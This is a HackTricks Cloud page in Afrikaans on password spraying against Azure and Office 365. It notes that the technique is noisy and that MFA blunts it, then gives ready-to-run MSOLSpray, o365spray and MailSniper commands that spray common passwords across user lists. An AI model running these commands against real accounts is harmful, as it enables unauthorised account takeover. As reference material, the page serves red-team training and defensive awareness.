Afrikaans - Ht Cloud
HackTricks TrainingTwitterLinkedinSponsor

Az - Password Spraying

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Wagwoord Spuit

In Azure kan dit gedoen word teen verskillende API-eindpunte soos Azure AD Graph, Microsoft Graph, Office 365 Reporting webservice, ens.

Let egter daarop dat hierdie tegniek baie lawaaierig is en die Blou Span dit maklik kan opvang. Verder kan gedwonge wagwoord kompleksiteit en die gebruik van MFA hierdie tegniek nutteloos maak.

Jy kan 'n wagwoord spuitaanval uitvoer met MSOLSpray

. .\MSOLSpray\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose

Of met o365spray

python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com

Of met MailSniper

#OWA
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
#EWS
Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt
#Gmail
Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

PreviousAz - Device Code Authentication PhishingNextAz - Services

Last updated